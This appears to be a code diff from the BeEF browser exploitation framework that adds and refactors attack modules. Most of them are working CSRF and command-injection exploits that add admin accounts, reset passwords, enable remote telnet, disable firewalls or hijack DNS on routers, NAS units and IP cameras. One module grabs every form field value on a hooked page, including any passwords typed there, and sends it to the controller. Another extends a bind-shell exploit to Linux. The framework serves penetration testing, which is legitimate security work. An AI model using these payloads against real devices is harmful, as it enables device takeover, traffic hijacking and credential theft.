+            } catch (e) {}
+            try {
+                mb = new ActiveXObject("SharePoint.OpenDocuments.3")
+            } catch (e) {}
+            try {
+                mc = new ActiveXObject("SharePoint.OpenDocuments.2")
+            } catch (e) {}
+            try {
+                md = new ActiveXObject("SharePoint.OpenDocuments.1")
+            } catch (e) {}
+            var a = typeof ma;
+            var b = typeof mb;
+            var c = typeof mc;
+            var d = typeof md;
+            var key = "No Office Found";
+            if (a == "object" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2010"
+            }
+            if (a == "number" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2007"
+            }
+            if (a == "number" && b == "number" && c == "object" && d == "object") {
+                key = "Office 2003"
+            }
+            if (a == "number" && b == "number" && c == "number" && d == "object") {
+                key = "Office Xp"
+            }
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "office="+key);
+
+});
+

modules/browser/detect_office/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_office:
+            enable: true
+            category: "Browser"
+            name: "Detect MS Office"
+            description: "This module detect the version of MS Office if installed"
+            authors: ["nbblrr"]
+            target:
+                working: ["IE"]
+                not_working: ["All"]

modules/browser/detect_office/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_office < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['office'] = @datastore['office']
+		save content
+	end
+
+end

modules/browser/hooked_domain/get_form_values/command.js

@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var form_data = new Array();
+
+	// loop through all forms
+	for (var f=0; f < document.forms.length; f++) {
+		// store type,name,value for all input fields
+		for (var i=0; i < document.forms[f].elements.length; i++) {
+			form_data.push(new Array(document.forms[f].elements[i].type, document.forms[f].elements[i].name, document.forms[f].elements[i].value));
+		}
+	}
+
+	// return form data
+	if (form_data.length) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+JSON.stringify(form_data));
+	// return if no input fields were found
+	} else {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Could not find any forms on '+window.location);
+	}
+
+});
+

modules/browser/hooked_domain/get_form_values/config.yaml

@@ -5,11 +5,11 @@
 #
 beef:
     module:
-        zenoss_daemon_csrf:
+        get_form_values:
             enable: true
-            category: "Exploits"
-            name: "Zenoss 3.x Daemon CSRF"
-            description: "Attempts to start/stop/restart daemons on a Zenoss Core 3.x server."
+            category: ["Browser", "Hooked Domain"]
+            name: "Get Form Values"
+            description: "This module retrieves the name, type, and value of all input fields for all forms on the page."
             authors: ["bcoles"]
             target:
                 working: ["ALL"]

modules/browser/hooked_domain/get_form_values/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_form_values < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['form_data'] = @datastore['form_data']
+		save content
+	end
+
+end

modules/exploits/beefbind/beef_bind_shell/command.js

@@ -9,6 +9,7 @@ beef.execute(function () {
     var rport = '<%= @rport %>';
     var path = '<%= @path %>';
     var cmd = '<%= @cmd %>';
+    var shellcode ='<%= @shellcode %>';
 
     var uri = "http://" + rhost + ":" + rport + path;
 
@@ -73,7 +74,11 @@ beef.execute(function () {
         };
         xhr.open("POST", uri, false);
         xhr.setRequestHeader("Content-Type", "text/plain");
-        command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+	if (shellcode == 'Linux'){
+            command = "cmd=" + command + "\n"; // very important only LF
+        }else{
+            command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+        }
         xhr.send(command);
         setTimeout("get_additional_cmd_results()",500);
     };

modules/exploits/beefbind/beef_bind_shell/module.rb

@@ -10,7 +10,11 @@ class Beef_bind_shell < BeEF::Core::Command
       { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
       { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
       { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
-      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}
+      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'},
+      { 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore',
+          'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']],
+          'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true
+        }
 		]
 	end
 

modules/exploits/camera/airlive_ip_camera_csrf/command.js

@@ -0,0 +1,30 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var base  = '<%= @base %>'; 
+  var path  = 'cgi-bin/admin/usrgrp.cgi';
+  var user  = '<%= @user %>';
+  var pass  = '<%= @pass %>';
+
+  var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET",
+    [{'type':'hidden', 'name':'user',     'value':user},
+     {'type':'hidden', 'name':'pwd',      'value':pass},
+     {'type':'hidden', 'name':'grp',      'value':'administrator'},
+     {'type':'hidden', 'name':'sgrp',     'value':'ptz'},
+     {'type':'hidden', 'name':'action',   'value':'add'},
+     {'type':'hidden', 'name':'redirect', 'value':''}
+    ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(airlive_ip_camera_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/camera/airlive_ip_camera_csrf/config.yaml

@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# For more information see:
+# http://www.exploit-db.com/exploits/26174/
+##
+beef:
+    module:
+        airlive_add_user_csrf:
+            enable: true
+            category: ["Exploits", "Camera"]
+            name: "Airlive Add User CSRF"
+            description: "Attempts to add an admin user on a Airlive camera.<br/><br/>This CSRF is reported to work on the following models: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.</br/><br/>Note: This module has not been tested on a real device."
+            authors: ["bcoles", "Eliezer Varadé Lopez", "Javier Repiso Sánchez", "Jonás Ropero Castillo"]
+            target:
+                unknown: ["ALL"]

modules/exploits/camera/airlive_ip_camera_csrf/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Airlive_add_user_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root',  'value' => 'http://192.168.0.1/'},
+			{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef'},
+			{'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js

@@ -0,0 +1,27 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var path    = '/cgi-bin/system_mgr.cgi';
+	var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+	var timeout = 15;
+
+	var dlink_sharecenter_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+		{'type':'hidden', 'name':'cmd',      'value':'cgi_sms_test'},
+		{'type':'hidden', 'name':'command1', 'value':cmd}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(dlink_sharecenter_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        dlink_sharecenter_cmd_exec:
+            enable: true
+            category: ["Exploits", "NAS"]
+            name: "D-Link ShareCenter Command Execution"
+            description: "Attempts to execute arbitrary commands on a D-Link ShareCenter NAS. Multiple models are affected, including DNS-320 and DNS-325, however this module has not been tested.<br/><br/>For more information see, http://blog.emaze.net/2012_02_01_archive.html"
+            authors: ["bcoles", "Roberto Paleari, Emaze Networks S.p.A."]
+            target:
+                working: ["ALL"]

modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb

@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# This module has not been tested. For more information see:
+# http://blog.emaze.net/2012_02_01_archive.html
+# http://www.securityfocus.com/archive/1/521532
+###
+class Dlink_sharecenter_cmd_exec < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name'=>'base', 'ui_label'=>'Router web root', 'value'=>'http://192.168.0.1/'},
+			{'name'=>'cmd',  'ui_label'=>'Command',         'value'=>'ls'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/php-5.3.9-dos/module.rb

@@ -14,7 +14,7 @@ class Php_dos < BeEF::Core::Command
 	def post_execute
 		content = {}
 		content['result'] = @datastore['result'] if not @datastore['result'].nil?
-		content['fail]    = @datastore['fail']   if not @datastore['fail'].nil?
+		content['fail']    = @datastore['fail']   if not @datastore['fail'].nil?
 		save content
 	end
 

modules/exploits/router/3com_officeconnect_cmd_exec/command.js

@@ -9,8 +9,9 @@ beef.execute(function() {
 	var gateway = '<%= @base %>'; 
 	var path    = 'utility.cgi';
 	var cmd     = '<%= @cmd %>';
+	var timeout = 15;
 
-	var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+	var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
 		{'type':'hidden', 'name':'testType', 'value':'1'},
 		{'type':'hidden', 'name':'IP',       'value':'||'+cmd}
 	]);
@@ -18,9 +19,9 @@ beef.execute(function() {
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 	cleanup = function() {
-		document.body.removeChild(com_officeconnect_iframe);
+		document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>);
 	}
-	setTimeout("cleanup()", 15000);
+	setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/actiontec_q1000_csrf/command.js

@@ -0,0 +1,52 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var user    = '<%= @user %>';
+	var passwd  = '<%= @password %>';
+	var port    = '<%= @port %>';
+	var timeout = 15;
+
+	var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", [
+		{'type':'hidden', 'name':'serCtlHttp',          'value':'1'},
+		{'type':'hidden', 'name':'adminUserName',       'value':user},
+		{'type':'hidden', 'name':'adminPassword',       'value':passwd},
+		{'type':'hidden', 'name':'remGuiTimeout',       'value':'0'},
+		{'type':'hidden', 'name':'remGuiPort',          'value':port}
+	]);
+
+	var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", [
+		{'type':'hidden', 'name':'serCtlTelnet',        'value':'1'},
+		{'type':'hidden', 'name':'remTelUser',          'value':user},
+		{'type':'hidden', 'name':'remTelPass',          'value':passwd},
+		{'type':'hidden', 'name':'remTelTimeout',       'value':'0'},
+		{'type':'hidden', 'name':'remTelPassChanged',   'value':'1'}
+	]);
+
+	var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", [
+		{'type':'hidden', 'name':'fwLevel',             'value':'Basic'},
+		{'type':'hidden', 'name':'fwStealthMode',       'value':'0'}
+	]);
+
+	var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", [
+		{'type':'hidden', 'name':'ipv6_fwlevel',        'value':'basic'},
+		{'type':'hidden', 'name':'ipv6_fwenable',       'value':'0'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(actiontec_q1000_iframe1_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe2_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe3_<%= @command_id %>);
+		document.body.removeChild(actiontec_q1000_iframe4_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/router/actiontec_q1000_csrf/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        actiontec_q1000_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Actiontec Q1000 CSRF"
+            description: "Attempts to enable remote web and telnet administration, and disables the firewall on an Actiontec Q1000 router."
+            authors: ["james-otten"]
+            target:
+                working: ["ALL"]

modules/exploits/router/actiontec_q1000_csrf/module.rb

@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Actiontec_q1000_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
+			{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'admin'},
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => 'BeEF'},
+			{'name' => 'port', 'ui_label' => 'Desired web ui port', 'value' => '443'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/router/asmax_ar804gu_cmd_exec/command.js

@@ -14,7 +14,7 @@ beef.execute(function() {
 	img.setAttribute("style","visibility:hidden");
 	img.setAttribute("width","0");
 	img.setAttribute("height","0");
-	img.id = 'asmax_ar804gu';
+	img.id = 'asmax_ar804gu_<%= @command_id %>';
 	img.src = gateway+path+cmd;
 	document.body.appendChild(img);
 

modules/exploits/router/belkin_dns_csrf/command.js

@@ -0,0 +1,70 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// config
+	var gateway = '<%= @base %>'; 
+	var path    = '/cgi-bin/setup_dns.exe';
+	var dns     = '<%= @dns %>';
+	var timeout = 15;
+
+	// validate DNS server IP address
+	var parts = dns.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+			return;
+		}
+	}
+	var dns_1 = parts[0];
+	var dns_2 = parts[1];
+	var dns_3 = parts[2];
+	var dns_4 = parts[3];
+
+	// attempt auth with default password (admin)
+	// incorrect login attempts do not log out an authenticated session
+	var img = new Image();
+	img.setAttribute("style", "visibility:hidden");
+	img.setAttribute("width", "0");
+	img.setAttribute("height","0");
+	img.id = 'belkin_auth_<%= @command_id %>';
+	img.src = gateway+"/cgi-bin/login.exe?pws=admin";
+	document.body.appendChild(img);
+
+	// change DNS
+	var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", [
+		{'type':'hidden', 'name':'dns1_1',   'value':dns_1},
+		{'type':'hidden', 'name':'dns1_2',   'value':dns_2},
+		{'type':'hidden', 'name':'dns1_3',   'value':dns_3},
+		{'type':'hidden', 'name':'dns1_4',   'value':dns_4},
+		{'type':'hidden', 'name':'dns2_1',   'value':dns_1},
+		{'type':'hidden', 'name':'dns2_2',   'value':dns_2},
+		{'type':'hidden', 'name':'dns2_3',   'value':dns_3},
+		{'type':'hidden', 'name':'dns2_4',   'value':dns_4},
+		{'type':'hidden', 'name':'dns2_1_t', 'value':dns_1},
+		{'type':'hidden', 'name':'dns2_2_t', 'value':dns_2},
+		{'type':'hidden', 'name':'dns2_3_t', 'value':dns_3},
+		{'type':'hidden', 'name':'dns2_4_t', 'value':dns_4},
+		{'type':'hidden', 'name':'auto_from_isp', 'value':'0'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(belkin_iframe_<%= @command_id %>);
+		document.body.removeChild(belkin_auth_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/router/belkin_dns_csrf/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        belkin_dns_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Belkin DNS Hijack CSRF"
+            description: "Attempts to change the DNS setting on a Belkin router.<br/><br/>Multiple models are affected, including F5D7230 and F1PI242EG, however this module has not been tested."
+            authors: ["bcoles"]
+            target:
+                unknown: ["ALL"]

modules/exploits/router/belkin_dns_csrf/module.rb

@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# This module has not been tested
+###
+class Belkin_dns_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
+			{'name' => 'dns', 'ui_label' => 'DNS Server', 'value' => '8.8.8.8'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/router/bt_home_hub_csrf/command.js

@@ -6,21 +6,21 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-
-
-  var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST",
-      [{'type':'hidden', 'name':'0', 'value':'31'} ,
-       {'type':'hidden', 'name':'1', 'value':''},
-       {'type':'hidden', 'name':'30', 'value':passwd}]);
+  var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", [
+    {'type':'hidden', 'name':'0',  'value':'31'} ,
+    {'type':'hidden', 'name':'1',  'value':''},
+    {'type':'hidden', 'name':'30', 'value':passwd}
+  ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(bt_home_hub_iframe);
+    document.body.removeChild(bt_home_hub_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/cisco_e2400_csrf/command.js

@@ -7,8 +7,9 @@
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
+  var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
       [
        {'type':'hidden', 'name':'submit_button',     'value':'Management'},
        {'type':'hidden', 'name':'change_action',     'value':''},
@@ -37,7 +38,7 @@ beef.execute(function() {
        {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'},
       ]);
 
-  var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
+  var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
       [
        {'type':'hidden', 'name':'submit_button',       'value':'Firewall'},
        {'type':'hidden', 'name':'change_action',       'value':''},
@@ -59,10 +60,10 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(cisco_e2400_iframe1);
-    document.body.removeChild(cisco_e2400_iframe2);
+    document.body.removeChild(cisco_e2400_iframe1_<%= @command_id %>);
+    document.body.removeChild(cisco_e2400_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/comtrend_ct5367_csrf/command.js

@@ -6,12 +6,13 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var ct5367_iframe1 = beef.dom.createInvisibleIframe();
-  ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+  var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
 
-  var ct5367_iframe2 = beef.dom.createInvisibleIframe();
+  var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
 
   var form = document.createElement('form');
   form.setAttribute('action', gateway + "password.cgi");
@@ -37,16 +38,16 @@ beef.execute(function() {
   input.setAttribute('value', passwd);
   form.appendChild(input);
 
-  ct5367_iframe2.contentWindow.document.body.appendChild(form);
+  ct5367_iframe2_<%= @command_id %>.contentWindow.document.body.appendChild(form);
   form.submit();
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(ct5367_iframe1);
-    document.body.removeChild(ct5367_iframe2);
+    document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
+    document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/comtrend_ct5624_csrf/command.js

@@ -6,21 +6,22 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var ct5367_iframe1 = beef.dom.createInvisibleIframe();
-  ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+  var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
 
-  var ct5367_iframe2 = beef.dom.createInvisibleIframe();
-  ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
+  var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(ct5367_iframe1);
-    document.body.removeChild(ct5367_iframe2);
+    document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
+    document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/dlink_dir_615_csrf/command.js

@@ -7,8 +7,9 @@
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
+  var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
       [{'type':'hidden', 'name':'ACTION_POST',     'value':'1'} ,
        {'type':'hidden', 'name':'apply',           'value':'Save Settings'},
        {'type':'hidden', 'name':'admin_name',      'value':'admin'},
@@ -23,9 +24,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(dir615_iframe);
+    document.body.removeChild(dir615_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/dlink_dsl500t_csrf/command.js

@@ -6,9 +6,10 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
+  var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
       [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
        {'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
        {'type':'hidden', 'name':'security:settings/password', 'value':passwd},
@@ -19,9 +20,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(dsl500t_iframe);
+    document.body.removeChild(dsl500t_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/huawei_smartax_mt880/command.js

@@ -5,19 +5,20 @@
 //
 
 beef.execute(function() {
-  var gateway = '<%= @base %>'; 
+  var gateway  = '<%= @base %>'; 
   var username = '<%= @username %>';
-  var passwd = '<%= @password %>';
+  var passwd   = '<%= @password %>';
+  var timeout  = 15;
 
-  var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
-  huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
+  var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(huawei_smartax_mt880_iframe);
+    document.body.removeChild(huawei_smartax_mt880_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/linksys_befsr41_csrf/command.js

@@ -5,15 +5,17 @@
 //
 
 beef.execute(function() {
+  var timeout = 15;
+
+  var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
 
-  var befsr41_iframe = beef.dom.createInvisibleIframe();
-  befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
